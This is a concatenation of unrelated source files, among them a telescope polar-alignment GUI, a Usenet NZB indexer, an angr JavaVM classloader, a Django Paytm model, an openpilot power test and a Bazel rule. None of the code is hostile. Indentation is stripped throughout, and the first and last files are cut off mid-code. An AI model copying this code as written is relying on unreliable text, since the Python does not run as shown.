stat_bar(self,'Incompatible image dimensions...')
return
if parity_frm_header(headi) == 0 :
stat_bar(self,'Wrong parity...')
return
self.update_display(cpcrdi, scalei)
cpcircle(cpcrdi, imi, scalei)
cross([axis], imi, 'Red')
if self.hemi == 'N':
poli = wcsi.wcs_world2pix(self.polaris, 1)
lami = wcsi.wcs_world2pix(self.lam, 1)
circle(poli, imi, 'White', 'a')
circle(lami, imi, 'Orange', 'l')
left = int(min(cpcrdi[0][0], poli[0][0], lami[0][0], axis[0]))
right = int(max(cpcrdi[0][0], poli[0][0], lami[0][0], axis[0]))
bottom = int(min(cpcrdi[0][1], poli[0][1], lami[0][1], axis[1]))
top = int(max(cpcrdi[0][1], poli[0][1], lami[0][1], axis[1]))
else:
ori = wcsi.wcs_world2pix(self.chi, 1)
whi = wcsi.wcs_world2pix(self.sigma, 1)
rei = wcsi.wcs_world2pix(self.red, 1)
circle(whi, imi, 'White', 's')
circle(ori, imi, 'Orange', 'c')
circle(rei, imi, 'Red', '!')
left = int(min(cpcrdi[0][0], ori[0][0], whi[0][0], axis[0]))
right = int(max(cpcrdi[0][0], ori[0][0], whi[0][0], axis[0]))
bottom = int(min(cpcrdi[0][1], ori[0][1], whi[0][1], axis[1]))
top = int(max(cpcrdi[0][1], ori[0][1], whi[0][1], axis[1]))
margin = int(2500/scalei)
xl = max(1, left - margin)
xr = min(widthi, right + margin)
yt = min(heighti, top + margin)
yb = max(1, bottom - margin)
croppedi = imi.crop((xl, yb, xr, yt))
croppedi.load()
crop_fn = splitext(self.iimg_fn)[0] + '_cropi.ppm'
croppedi.save(crop_fn, 'PPM')
self.create_imgwin(crop_fn, self.iimg_fn)
stat_bar(self, 'Idle')
def annotate(self):
'''
Find RA axis and Annotate the pair of horiz/vertical images
'''
from PIL import Image
from astropy.time import Time
import scipy.optimize
from astropy.coordinates import SkyCoord
from astropy.coordinates import FK5
from astropy.io import fits
from astropy import wcs
import numpy
from os.path import splitext
#
if self.vimg_fn == self.himg_fn:
stat_bar(self, ('Image filenames coincide - Check the Image ' +
'filenames'))
return
try:
imh = Image.open(self.himg_fn)
# Load the FITS hdulist using astropy.io.fits
hdulistv = fits.open(self.vwcs_fn)
hdulisth = fits.open(self.hwcs_fn)
except IOError:
return
stat_bar(self, 'Finding RA axis...')
# Parse the WCS keywords in the primary HDU
headv = hdulistv[0].header
headh = hdulisth[0].header
wcsv = wcs.WCS(headv)
wcsh = wcs.WCS(headh)
decv = dec_frm_header(headv)
dech = dec_frm_header(headh)
if decv > 65 and dech > 65:
self.hemi = 'N'
elif decv < -65 and dech < -65:
self.hemi = 'S'
else:
stat_bar(self, 'Nowhere near (>25 deg) the Poles!')
return
now = Time.now()
if self.hemi == 'N':
cp = SkyCoord(ra=0, dec=90, frame='fk5', unit='deg', equinox=now)
else:
cp = SkyCoord(ra=0, dec=-90, frame='fk5', unit='deg', equinox=now)
# CP now, in J2000 coordinates, precess
cpj2000 = cp.transform_to(FK5(equinox='J2000'))
# sky coordinates
cpskycrd = numpy.array([[cpj2000.ra.deg, cpj2000.dec.deg]],
numpy.float_)
# pixel coordinates
cpcrdh = wcsh.wcs_world2pix(cpskycrd, 1)
if self.hemi == 'N':
print 'Northern Celestial Pole', dech
else:
print 'Southern Celestial Pole', dech
scaleh = scale_frm_header(headh)
widthh, heighth = wid_hei_frm_header(headh)
if wid_hei_frm_header(headh) != wid_hei_frm_header(headv):
stat_bar(self, 'Incompatible image dimensions...')
return
if parity_frm_header(headh) == 0 or parity_frm_header(headv) == 0 :
stat_bar(self, 'Wrong parity...')
return
def displacement(coords):
'''
the movement of a sky object in the two images
'''
pixcrd1 = numpy.array([coords], numpy.float_)
skycrd = wcsv.wcs_pix2world(pixcrd1, 1)
pixcrd2 = wcsh.wcs_world2pix(skycrd, 1)
return pixcrd2 - pixcrd1
axis = scipy.optimize.broyden1(displacement, [widthh/2, heighth/2])
self.axis = axis
self.update_display(cpcrdh, scaleh)
#
stat_bar(self, 'Annotating...')
cpcircle(cpcrdh, imh, scaleh)
cross([axis], imh, 'Red')
# add reference stars
if self.hemi == 'N':
polh = wcsh.wcs_world2pix(self.polaris, 1)
lamh = wcsh.wcs_world2pix(self.lam, 1)
circle(polh, imh, 'White', 'a')
circle(lamh, imh, 'Orange', 'l')
left = int(min(cpcrdh[0][0], polh[0][0], lamh[0][0], axis[0]))
right = int(max(cpcrdh[0][0], polh[0][0], lamh[0][0], axis[0]))
bottom = int(min(cpcrdh[0][1], polh[0][1], lamh[0][1], axis[1]))
top = int(max(cpcrdh[0][1], polh[0][1], lamh[0][1], axis[1]))
else:
orh = wcsh.wcs_world2pix(self.chi, 1)
whh = wcsh.wcs_world2pix(self.sigma, 1)
reh = wcsh.wcs_world2pix(self.red, 1)
circle(whh, imh, 'White', 's')
circle(orh, imh, 'Orange', 'c')
circle(reh, imh, 'Red', '!')
left = int(min(cpcrdh[0][0], orh[0][0], whh[0][0], axis[0]))
right = int(max(cpcrdh[0][0], orh[0][0], whh[0][0], axis[0]))
bottom = int(min(cpcrdh[0][1], orh[0][1], whh[0][1], axis[1]))
top = int(max(cpcrdh[0][1], orh[0][1], whh[0][1], axis[1]))
margin = int(2500/scaleh)
xl = max(1, left - margin)
xr = min(widthh, right + margin)
yt = min(heighth, top + margin)
yb = max(1, bottom - margin)
croppedh = imh.crop((xl, yb, xr, yt))
croppedh.load()
crop_fn = splitext(self.himg_fn)[0] + '_croph.ppm'
croppedh.save(crop_fn, 'PPM')
self.create_imgwin(crop_fn, self.himg_fn)
stat_bar(self, 'Idle')
def create_imgwin(self, img_fn, title):
'''
creates a window to display an image
'''
from os.path import basename
# create child window
img = PhotoImage(file=img_fn)
win = Toplevel()
wwid = min(800, img.width())
whei = min(800, img.height())
win.geometry(('%dx%d' % (wwid+28, whei+28)))
win.title(basename(title))
frame = Frame(win, bd=0)
frame.pack()
xscrollbar = Scrollbar(frame, orient='horizontal')
xscrollbar.pack(side='bottom', fill='x')
yscrollbar = Scrollbar(frame, orient='vertical')
yscrollbar.pack(side='right', fill='y')
canvas = Canvas(frame, bd=0, width=wwid, height=whei,
scrollregion=(0, 0, img.width(), img.height()),
xscrollcommand=xscrollbar.set,
yscrollcommand=yscrollbar.set)
canvas.pack(side='top', fill='both', expand=1)
canvas.create_image(0, 0, image=img, anchor='nw')
xscrollbar.config(command=canvas.xview)
yscrollbar.config(command=canvas.yview)
frame.pack()
# next statement is important! creates reference to img
canvas.img = img
def update_solved_labels(self, hint, sta):
'''
updates displayed Solved labels
'''
if hint == 'v':
widget = self.wvok
elif hint == 'h':
widget = self.whok
elif hint == 'i':
widget = self.wiok
# oldstate = widget.config()['state'][4]
if (sta == 'active'):
widget.configure(state='active', bg='green',
activebackground='green',
highlightbackground='green')
elif (sta == 'disabled'):
widget.configure(state='disabled', bg='red',
activebackground='red',
highlightbackground='red')
widget.update()
def slurpAT(self):
import tkFileDialog
import ConfigParser
stat_bar(self,'Reading...')
options = {}
options['filetypes'] = [('Config files', '.cfg'),
('all files', '.*')]
options['initialdir'] = self.imgdir
options['title'] = 'The AstroTortilla configuration file'
cfg_fn = tkFileDialog.askopenfilename(**options)
config = ConfigParser.SafeConfigParser()
config.read(cfg_fn)
for s in config.sections():
if s == 'Solver-AstrometryNetSolver':
for o in config.options(s):
if o == 'configfile':
self.local_configfile.set(config.get(s,o, None))
elif o == 'shell':
self.local_shell.set(config.get(s,o, None))
elif o == 'downscale':
self.local_downscale.set(config.get(s,o, None))
elif o == 'scale_units':
self.local_scale_units.set(config.get(s,o,None))
elif o == 'scale_low':
self.local_scale_low.set(config.get(s,o,None))
elif o == 'scale_max':
self.local_scale_hi.set(config.get(s,o, None))
elif o == 'xtra':
self.local_xtra.set(config.get(s,o,None))
stat_bar(self,'Idle')
return
def create_widgets(self, master=None):
'''
creates the main window components
'''
self.myparent = master
self.myparent.title('Photo Polar Alignment')
#
self.menubar = Menu(master)
self.filemenu = Menu(self.menubar, tearoff=0)
self.helpmenu = Menu(self.menubar, tearoff=0)
self.menubar.add_cascade(label='File', menu=self.filemenu)
self.menubar.add_cascade(label='Help', menu=self.helpmenu)
self.filemenu.add_command(label='Settings...',
command=self.settings_open)
self.filemenu.add_command(label='Exit', command=self.quit_method)
self.helpmenu.add_command(label='Help', command=help_f)
self.helpmenu.add_command(label='About...', command=about_f)
self.myparent.config(menu=self.menubar)
# #################################################################
self.wfrop = LabelFrame(master, text='Operations')
self.wfrop.pack(side='top', fill='x')
#
nxt = Button(self.wfrop, image=self.vicon, command=lambda : self.get_file('v'))
nxt.grid(row=0, column=0, sticky='ew', padx=10, pady=4, rowspan=3)
self.wvfn = nxt
nxt = Button(self.wfrop, text='Nova', command=lambda : self.solve('v','nova'))
nxt.grid(row=0, column=1, sticky='ew', padx=10, pady=4)
self.wvsol = nxt
nxt = Button(self.wfrop, text='Local', command=lambda : self.solve('v','local'))
nxt.grid(row=1, column=1, sticky='ew', padx=10, pady=4)
self.wlvsol = nxt
nxt = Label(self.wfrop, text='Solved', state='disabled')
nxt.grid(row=2, column=1, sticky='ew', padx=10, pady=4)
self.wvok = nxt
#
nxt = Button(self.wfrop, image=self.hicon, command=lambda : self.get_file('h'))
nxt.grid(row=3, column=0, sticky='ew', padx=10, pady=4, rowspan=3)
self.whfn = nxt
nxt = Button(self.wfrop, text='Nova', command=lambda : self.solve('h','nova'))
nxt.grid(row=3, column=1, sticky='ew', padx=10, pady=4)
self.whsol = nxt
nxt = Button(self.wfrop, text='Local', command=lambda : self.solve('h','local'))
nxt.grid(row=4, column=1, sticky='ew', padx=10, pady=4)
self.wlhsol = nxt
nxt = Label(self.wfrop, text='Solved', state='disabled')
nxt.grid(row=5, column=1, sticky='ew', padx=10, pady=4)
self.whok = nxt
#
nxt = Button(self.wfrop, text='Find Polar Axis',
command=self.annotate)
nxt.grid(row=6, column=0, sticky='ew', padx=10, pady=4, columnspan=2)
self.wann = nxt
#
nxt = Button(self.wfrop, image=self.iicon, command=lambda : self.get_file('i'))
nxt.grid(row=3, column=3, sticky='ew', padx=10, pady=4, rowspan=3)
self.wifn = nxt
nxt = Button(self.wfrop, text='Nova', command=lambda : self.solve('i','nova'))
nxt.grid(row=3, column=4, sticky='ew', padx=10, pady=4)
self.wisol = nxt
nxt = Button(self.wfrop, text='Local', command=lambda : self.solve('i','local'))
nxt.grid(row=4, column=4, sticky='ew', padx=10, pady=4)
self.wlisol = nxt
nxt = Label(self.wfrop, text='Solved', state='disabled')
nxt.grid(row=5, column=4, sticky='ew', padx=10, pady=4)
self.wiok = nxt
#
nxt = Button(self.wfrop, text='Show Improvement',
command=self.annotate_imp)
nxt.grid(row=6, column=3, sticky='ew', padx=10, pady=4, columnspan=2)
self.wanni = nxt
# #################################################################
nxt = LabelFrame(master, borderwidth=2, relief='ridge',
text='Info')
nxt.pack(side='top', fill='x')
self.wfrvar = nxt
nxt = Label(self.wfrvar, text = 'Given')
nxt.grid(row=0, column=1, columnspan=2, sticky='w')
nxt = Label(self.wfrvar, anchor='w', text='Vertical:')
nxt.grid(row=1, column=0, sticky='w')
nxt = Label(self.wfrvar, text='---------')
nxt.grid(row=1, column=1, sticky='e')
self.wvar1 = nxt
nxt = Label(self.wfrvar, text='Horizontal:')
nxt.grid(row=2, column=0, sticky='w')
nxt = Label(self.wfrvar, text='---------')
nxt.grid(row=2, column=1, sticky='e')
self.wvar2 = nxt
nxt = Label(self.wfrvar, text='Improved:')
nxt.grid(row=3, column=0, sticky='w')
nxt = Label(self.wfrvar, text='---------')
nxt.grid(row=3, column=1, sticky='e')
self.wvar3 = nxt
nxt = Label(self.wfrvar, text='API key:')
nxt.grid(row=4, column=0, sticky='w')
nxt = Label(self.wfrvar, text=('%.3s...........' % self.apikey.get()))
nxt.grid(row=4, column=1, sticky='e')
self.wvar4 = nxt
nxt = Label(self.wfrvar, text = 'Computed')
nxt.grid(row=0, column=3, columnspan=2, sticky='w')
nxt = Label(self.wfrvar, text='Scale (arcsec/pixel):')
nxt.grid(row=1, column=2, sticky='w')
if self.havescale:
nxt = Label(self.wfrvar, text=self.scale)
else:
nxt = Label(self.wfrvar, text='--.--')
nxt.grid(row=1, column=3, sticky='e')
self.wvar5 = nxt
nxt = Label(self.wfrvar, text='RA axis position:')
nxt.grid(row=2, column=2, sticky='w')
nxt = Label(self.wfrvar, text='---,---')
nxt.grid(row=2, column=3, sticky='e')
self.wvar6 = nxt
nxt = Label(self.wfrvar, text='CP position:')
nxt.grid(row=3, column=2, sticky='w')
nxt = Label(self.wfrvar, text='---,---')
nxt.grid(row=3, column=3, sticky='e')
self.wvar7 = nxt
nxt = Label(self.wfrvar, text='Error (arcmin):')
nxt.grid(row=4, column=2, sticky='w')
nxt = Label(self.wfrvar, text='--.--')
nxt.grid(row=4, column=3, sticky='e')
self.wvar8 = nxt
# #################################################################
nxt = LabelFrame(master, borderwidth=2, relief='ridge',
text='Move (dd:mm:ss)')
nxt.pack(side='top', fill='x')
self.wfrmo = nxt
nxt = Label(self.wfrmo, anchor='center', font='-weight bold -size 14')
nxt.pack(anchor='center')
self.wvar9 = nxt
# #################################################################
nxt = LabelFrame(master, borderwidth=2, relief='ridge', text='Status')
nxt.pack(side='bottom', fill='x')
self.wfrst = nxt
nxt = Label(self.wfrst, anchor='w', text=self.stat_msg)
nxt.pack(anchor='w')
self.wstat = nxt
def __init__(self, master=None):
import ConfigParser
import numpy
import os
# a F8Ib 2.0 mag star, Alpha Ursa Minoris
self.polaris = numpy.array([[037.954561, 89.264109]], numpy.float_)
#
# a M1III 6.4 mag star, Lambda Ursa Minoris
self.lam = numpy.array([[259.235229, 89.037706]], numpy.float_)
#
# a F0III 5.4 mag star, Sigma Octans
self.sigma = numpy.array([[317.195164, -88.956499]], numpy.float_)
#
# a K3IIICN 5.3 mag star, Chi Octans
self.chi = numpy.array([[283.696388, -87.605843]], numpy.float_)
#
# a M1III 7.2 mag star, HD90104
self.red = numpy.array([[130.522862, -89.460536]], numpy.float_)
#
# the pixel coords of the RA axis, if solution exists
self.axis = None
self.havea = False
# the Settings window
self.settings_win = None
# the User preferences file
self.cfgfn = 'PPA.ini'
self.local_shell = StringVar()
self.local_downscale = IntVar()
self.local_configfile = StringVar()
self.local_scale_units = StringVar()
self.local_scale_low = DoubleVar()
self.local_scale_hi = DoubleVar()
self.local_xtra = StringVar()
# Read the User preferences
self.config = ConfigParser.ConfigParser()
self.config.read(self.cfgfn)
# ...the key
try:
k_ini = self.config.get('nova', 'apikey', None)
except :
k_ini = None
self.apikey = StringVar(value=k_ini)
# ...the Image directory
try:
self.imgdir = self.config.get('file', 'imgdir', None)
except :
self.imgdir = None
# ...geometry
try:
self.usergeo = self.config.get('appearance', 'geometry', None)
except :
self.usergeo = None
master.geometry(self.usergeo)
# do we want to help solves by restricting the scale once we have an estimate
self.restrict_scale = IntVar(0)
try:
self.restrict_scale.set(self.config.get('operations','restrict scale', 0))
except:
self.restrict_scale.set(0)
# the filenames of images
self.vimg_fn = ''
self.havev = False
self.himg_fn = ''
self.haveh = False
self.iimg_fn = ''
self.havei = False
# the filenames of the .wcs solutions
self.vwcs_fn = ''
self.hwcs_fn = ''
self.iwcs_fn = ''
# the button icons
self.vicon = PhotoImage(file='v2_2.ppm')
self.hicon = PhotoImage(file='h2_2.ppm')
self.iicon = PhotoImage(file='i2_2.ppm')
# the solved image scale
self.havescale = False
self.scale = None
# the discovered hemisphere
self.hemi = None
# initialise attributes set elsewhere
self.menubar = None
self.helpmenu = None
self.filemenu = None
self.wfrop = None
self.wvfn = None
self.wvsol = None
self.wlvsol = None
self.wvok = None
self.whfn = None
self.whsol = None
self.wlhsol = None
self.whok = None
self.wifn = None
self.wisol = None
self.wlisol = None
self.wiok = None
self.wann = None
self.wanni = None
self.wfr2 = None
self.wfrvar = None
self.wvar1 = None
self.wvar2 = None
self.wvar3 = None
self.wvar4 = None
self.wfrcomp = None
self.wvar5 = None
self.wvar6 = None
self.wvar7 = None
self.wvar8 = None
self.wfrmo = None
self.wvar9 = None
self.wfrst = None
self.wstat = None
self.myparent = None
self.stat_msg = 'Idle'
Frame.__init__(self, master)
self.create_widgets(master)
# check local solver
self.wlvsol.configure(state='disabled')
self.wlhsol.configure(state='disabled')
self.wlisol.configure(state='disabled')
try:
self.local_shell.set(self.config.get('local','shell',''))
self.local_downscale.set(self.config.get('local','downscale',1))
self.local_configfile.set(self.config.get('local','configfile',''))
self.local_scale_units.set(self.config.get('local','scale_units',''))
self.local_scale_low.set(self.config.get('local','scale_low',0))
self.local_scale_hi.set(self.config.get('local','scale_hi',0))
self.local_xtra.set(self.config.get('local','xtra',''))
# check solve-field cmd
exit_status = os.system(self.local_shell.get() % 'solve-field > /dev/null')
if exit_status != 0:
print "Can't use local astrometry.net solver, check PATH"
else:
self.wlvsol.configure(state='active')
self.wlhsol.configure(state='active')
self.wlisol.configure(state='active')
except:
self.local_shell.set('')
self.local_downscale.set(1)
self.local_configfile.set('')
self.local_scale_units.set('')
self.local_scale_low.set(0)
self.local_scale_hi.set(0)
self.local_xtra.set('')
if not self.apikey.get() or self.apikey.get()=='':
self.settings_open()
self.pack()
#
ROOT = Tk()
ROOT.geometry('440x470+300+300')
APP = PhotoPolarAlign(master=ROOT)
ROOT.mainloop()
|
from matplotlib import pyplot as plt
def get_losses(log_file, filter_text):
with open(log_file) as f:
lines = f.readlines()
f.close()
begin_line, end_line = None, len(lines)
for line, _ in enumerate(lines):
if _.startswith(filter_text):
begin_line = line
break
losses = []
for line in range(begin_line+1, end_line):
content = lines[line]
if 'Iter' not in content:
continue
if 'val' in content:
continue
loss = content.split(':')[-1].strip()
losses.append(float(loss))
return losses
if __name__ == '__main__':
log_file_transformer = 'workspace/VSRTransformer/result/transformer.log'
log_file_basicVSR = 'workspace/VSRTransformer/result/basicvsr.log'
text_transformer = '2021-08-04 16:28:37,527 - mmedit - INFO - workflow:'
text_basicVSR = '2021-07-24 15:20:51,512 - mmedit - INFO - workflow'
losses_transformer = get_losses(log_file_transformer, text_transformer)
losses_basicVSR = get_losses(log_file_basicVSR, text_basicVSR)
ckpt_interval = 50
min = 10
idx = 0
for i in range(ckpt_interval-1,len(losses_basicVSR),ckpt_interval):
if losses_basicVSR[i] < min:
min=losses_basicVSR[i]
idx = i
print(idx,min)
plt.plot([_ for _ in range(len(losses_transformer))], losses_transformer, 'b')
plt.plot([_ for _ in range(len(losses_basicVSR))], losses_basicVSR,'r')
plt.show()
|
# index.py
# Scott Metoyer, 2013
# Retrieves a list of new NZB's from the newsgroups specified in a config file
from nntplib import *
from pymongo import MongoClient
import string
import datetime
import time
try:
from config_local import config as config
except ImportError:
from config_default import config as config
mongo_connection = MongoClient('localhost', 27017)
db = mongo_connection.nzb_database
newsgroups = db.newsgroup_collection
articles = db.article_collection
def connect():
print('Connecting to ' + config["usenet_server"] + '...')
server = NNTP(config["usenet_server"], config["usenet_port"], config["usenet_username"], config["usenet_password"])
return server
def fetch_articles(group, start_index):
article_count = 0
server = connect()
print('Reading from group ' + group + '...')
resp, count, first, last, name = server.group(group)
print('Getting a list of nzb files in ' + group + '...')
if start_index < int(first):
start_index = int(first)
current_index = int(start_index)
last_index = int(last)
chunk_size = 10000
# Some sanity checking on the maximum number to process. If it's too many, we only grab the newest.
if last_index - current_index > config["max_run_size"]:
current_index = last_index - config["max_run_size"]
while (current_index < last_index):
if (current_index + chunk_size >= last_index):
chunk_size = last_index - current_index
try:
resp, items = server.xover(str(current_index), str(current_index + chunk_size))
except:
print("Error grabbing articles. Attempting to reconnect...")
server = connect()
server.group(group)
resp, items = server.xover(str(current_index), str(current_index + chunk_size))
print("Reconnected.")
for number, subject, poster, date, id, references, size, lines in items:
if '.nzb' in subject.lower():
# Check make sure this article doesn't exist in the database already
if articles.find_one({"message-id": id}) == None:
article = {"message-id": id,
"group": group,
"article-number": number,
"subject": subject,
"date": date}
try:
articles.insert(article)
print(group + "," + number + ": " + subject)
article_count += 1
except:
print("Error inserting article. Continuing...")
else:
print("Article " + id + " already exists in the database. Continuing...")
current_index += chunk_size
server.quit()
print("Articles added: " + str(article_count))
return current_index
def get_group(group_name):
group = newsgroups.find_one({"name": group_name})
if group == None:
group = {"name": group_name,
"last_scan": datetime.datetime.now(),
"last_article": 0}
newsgroups.insert(group)
return group
def update_group(group_name, last_article):
# Make sure the group exists
get_group(group_name)
newsgroups.update({"name": group_name},
{"$set": {
"last_scan": datetime.datetime.now(),
"last_article": last_article
}
})
# Grab groups to scan from configuration file
f = open("groups.txt", "r")
groups = (line.strip() for line in f.readlines() if len(line.strip()))
f.close()
print("Starting run...")
start = time.time()
for group_name in groups:
group_name = group_name
settings = get_group(group_name)
last_index = fetch_articles(group_name, settings["last_article"] + 1)
update_group(group_name, last_index)
end = time.time()
elapsed = end - start
print("Execution time: " + str(elapsed / 60) + " minutes") |
import os
def run_sgd_trained_experiment(gpu_id, cpu_list):
os.system("mkdir -p ./results/sgd8")
command = f"CUDA_VISIBLE_DEVICES={gpu_id} taskset -c {cpu_list} " \
f"python tools/cifar_bound_comparison.py " \
f"./networks/cifar_sgd_8px.pth 0.01960784313 ./results/sgd8 --from_intermediate_bounds"
print(command)
os.system(command)
def run_madry_trained_experiment(gpu_id, cpu_list):
os.system("mkdir -p ./results/madry8")
command = f"CUDA_VISIBLE_DEVICES={gpu_id} taskset -c {cpu_list} " \
f"python tools/cifar_bound_comparison.py " \
f"./networks/cifar_madry_8px.pth 0.04705882352 ./results/madry8 --from_intermediate_bounds"
print(command)
os.system(command)
if __name__ == "__main__":
gpu_id = 0
cpu_list = "0-3"
run_madry_trained_experiment(gpu_id, cpu_list)
run_sgd_trained_experiment(gpu_id, cpu_list)
|
# Enter your code here. Read input from STDIN. Print output to STDOUT
from collections import defaultdict
def loop_up_occurence_index( word_index_dict:defaultdict, word:str)->None:
loop_up_result = word_index_dict[word]
if len(loop_up_result) != 0 :
print(' '.join( map(str, loop_up_result) ) )
else:
print(-1)
return
if __name__ == '__main__':
# key: string
# value: list of occurrence index, index starts counting from 1
word_index_dict = defaultdict( list )
buf = list( map( int, input().split() ) )
n, m = buf[0], buf[1]
for occ_idx in range(n):
word = input()
# update occurrence index of word
word_index_dict[word].append( occ_idx+1 )
for _ in range( m ):
word_of_look_up = input()
loop_up_occurence_index( word_index_dict, word_of_look_up )
|
from pyradioconfig.parts.ocelot.calculators.calc_fec import CALC_FEC_Ocelot
class Calc_FEC_Bobcat(CALC_FEC_Ocelot):
pass |
import logging
from archinfo.arch_soot import (SootAddressDescriptor, SootAddressTerminator,
SootClassDescriptor)
from ..engines.soot.method_dispatcher import resolve_method
from ..engines import UberEngine
from ..sim_state import SimState
from .plugin import SimStatePlugin
l = logging.getLogger("angr.state_plugins.javavm_classloader")
class SimJavaVmClassloader(SimStatePlugin):
"""
JavaVM Classloader is used as an interface for resolving and initializing
Java classes.
"""
def __init__(self, initialized_classes=None):
super(SimJavaVmClassloader, self).__init__()
self._initialized_classes = set() if initialized_classes is None else initialized_classes
def get_class(self, class_name, init_class=False, step_func=None):
"""
Get a class descriptor for the class.
:param str class_name: Name of class.
:param bool init_class: Whether the class initializer <clinit> should be
executed.
:param func step_func: Callback function executed at every step of the simulation manager during
the execution of the main <clinit> method
"""
# try to get the soot class object from CLE
java_binary = self.state.javavm_registers.load('ip_binary')
soot_class = java_binary.get_soot_class(class_name, none_if_missing=True)
# create class descriptor
class_descriptor = SootClassDescriptor(class_name, soot_class)
# load/initialize class
if init_class:
self.init_class(class_descriptor, step_func=step_func)
return class_descriptor
def get_superclass(self, class_):
"""
Get the superclass of the class.
"""
if not class_.is_loaded or class_.superclass_name is None:
return None
return self.get_class(class_.superclass_name)
def get_class_hierarchy(self, base_class):
"""
Walks up the class hierarchy and returns a list of all classes between
base class (inclusive) and java.lang.Object (exclusive).
"""
classes = [base_class]
while classes[-1] is not None and classes[-1] != "java.lang.Object":
classes.append(self.get_superclass(classes[-1]))
return classes[:-1]
def is_class_initialized(self, class_):
"""
Indicates whether the classes initializing method <clinit> was already
executed on the state.
"""
return class_ in self.initialized_classes
def init_class(self, class_, step_func=None):
"""
This method simulates the loading of a class by the JVM, during which
parts of the class (e.g. static fields) are initialized. For this, we
run the class initializer method <clinit> (if available) and update
the state accordingly.
Note: Initialization is skipped, if the class has already been
initialized (or if it's not loaded in CLE).
"""
if self.is_class_initialized(class_):
l.debug("Class %r already initialized.", class_)
return
l.debug("Initialize class %r.", class_)
self.initialized_classes.add(class_)
if not class_.is_loaded:
l.warning("Class %r is not loaded in CLE. Skip initializiation.", class_)
return
clinit_method = resolve_method(self.state, '<clinit>', class_.name,
include_superclasses=False, init_class=False)
if clinit_method.is_loaded:
engine = UberEngine(self.state.project)
# use a fresh engine, as the default engine instance may be in use at this time
javavm_simos = self.state.project.simos
clinit_state = javavm_simos.state_call(addr=SootAddressDescriptor(clinit_method, 0, 0),
base_state=self.state,
ret_addr=SootAddressTerminator())
simgr = self.state.project.factory.simgr(clinit_state)
l.info(">"*15 + " Run class initializer %r ... " + ">"*15, clinit_method)
simgr.run(step_func=step_func, engine=engine)
l.debug("<"*15 + " Run class initializer %r ... done " + "<"*15, clinit_method)
# The only thing that can be updated during initialization are
# static or rather global information, which are either stored on
# the heap or in the vm_static_table
self.state.memory.vm_static_table = simgr.deadended[-1].memory.vm_static_table.copy()
self.state.memory.heap = simgr.deadended[-1].memory.heap.copy()
else:
l.debug("Class initializer <clinit> is not loaded in CLE. Skip initializiation.")
@property
def initialized_classes(self):
"""
List of all initialized classes.
"""
return self._initialized_classes
@SimStatePlugin.memo
def copy(self, memo): # pylint: disable=unused-argument
return SimJavaVmClassloader(
initialized_classes=self.initialized_classes.copy()
)
def merge(self, others, merge_conditions, common_ancestor=None): # pylint: disable=unused-argument
l.warning("Merging is not implemented for JavaVM classloader!")
return False
def widen(self, others): # pylint: disable=unused-argument
l.warning("Widening is not implemented for JavaVM classloader!")
return False
# TODO use a default JavaVM preset
# see for reference: angr/engines/__init__.py
SimState.register_default('javavm_classloader', SimJavaVmClassloader)
|
from django.db import models
from django.conf import settings
from django.utils import timezone
# Create your models here.
class PaytmHistory(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='rel_payment_paytm', on_delete=models.CASCADE)
ORDERID = models.CharField('ORDER ID', max_length=30)
TXNDATE = models.DateTimeField('TXN DATE', default=timezone.now)
TXNID = models.IntegerField('TXN ID')
BANKTXNID = models.IntegerField('BANK TXN ID', null=True, blank=True)
BANKNAME = models.CharField('BANK NAME', max_length=50, null=True, blank=True)
RESPCODE = models.IntegerField('RESP CODE')
PAYMENTMODE = models.CharField('PAYMENT MODE', max_length=10, null=True, blank=True)
CURRENCY = models.CharField('CURRENCY', max_length=4, null=True, blank=True)
GATEWAYNAME = models.CharField("GATEWAY NAME", max_length=30, null=True, blank=True)
MID = models.CharField(max_length=40)
RESPMSG = models.TextField('RESP MSG', max_length=250)
TXNAMOUNT = models.FloatField('TXN AMOUNT')
STATUS = models.CharField('STATUS', max_length=12)
class Meta:
app_label = 'paytm'
def __unicode__(self):
return self.STATUS
|
#!/usr/bin/env python3
import unittest
import time
import math
from dataclasses import dataclass
from selfdrive.hardware import HARDWARE, TICI
from selfdrive.hardware.tici.power_monitor import get_power
from selfdrive.manager.process_config import managed_processes
from selfdrive.manager.manager import manager_cleanup
@dataclass
class Proc:
name: str
power: float
rtol: float = 0.05
atol: float = 0.1
warmup: float = 6.
PROCS = [
Proc('camerad', 2.15),
Proc('modeld', 1.0),
Proc('dmonitoringmodeld', 0.25),
Proc('encoderd', 0.23),
]
class TestPowerDraw(unittest.TestCase):
@classmethod
def setUpClass(cls):
if not TICI:
raise unittest.SkipTest
def setUp(self):
HARDWARE.initialize_hardware()
HARDWARE.set_power_save(False)
def tearDown(self):
manager_cleanup()
def test_camera_procs(self):
baseline = get_power()
prev = baseline
used = {}
for proc in PROCS:
managed_processes[proc.name].start()
time.sleep(proc.warmup)
now = get_power(8)
used[proc.name] = now - prev
prev = now
manager_cleanup()
print("-"*35)
print(f"Baseline {baseline:.2f}W\n")
for proc in PROCS:
cur = used[proc.name]
expected = proc.power
print(f"{proc.name.ljust(20)} {expected:.2f}W {cur:.2f}W")
with self.subTest(proc=proc.name):
self.assertTrue(math.isclose(cur, expected, rel_tol=proc.rtol, abs_tol=proc.atol))
print("-"*35)
if __name__ == "__main__":
unittest.main()
|
# Maps environment variables to variables accessible within Bazel Build files
def _impl(repository_ctx):
env_vars = repository_ctx.attr.env_vars
bzl_vars = ""
for env_var in env_vars:
bzl_var = repository_ctx.execute(["printenv", env_var]).stdout.rstrip()
bzl_vars = bzl_vars + "\n{} = \"{}\"".format(env_var, bzl_var)
repository_ctx.file("env_vars.bzl", bzl_vars)
repository_ctx.file("BUILD.bazel", """
exports_files(["env_vars.bzl"])
""")
load_env_vars = repository_rule(
implementation = _impl,
attrs = {
"env_vars": attr.string_list(mandatory = True)
}
)
|
from framework.latentmodule import LatentModule
import random
import time
class Main(LatentModule):
def __init__(self):
LatentModule.__init__(self)
# set defaults for some configurable parameters:
self.trials = 5
def run(self):
self.write('We are now testing your reaction times.\nPress the space bar when you are ready.','space')
self.write('First we will test your keyboard.\nWhen the red rectangle disappears, press the Enter key.',3)
self.rectangle((-0.5,0.5,-0.2,0.2),duration=3.5,color=(1,0,0,1))
if self.waitfor('enter',duration=30):
self.write('Good.',2)
else:
self.write('It doesn''t look like you''re pressing the enter key. Ending the experiment.',3)
return
self.write('Now, whenever the crosshair comes up, press the enter key as fast as possible.\nYou have 3 seconds for each trial. There will be %i trials.\nSpace when ready.' % self.trials,'space')
# countdown
for k in [3,2,1]:
self.write(str(k),1,scale=0.2)
all_reaction_times = []
for k in range(self.trials):
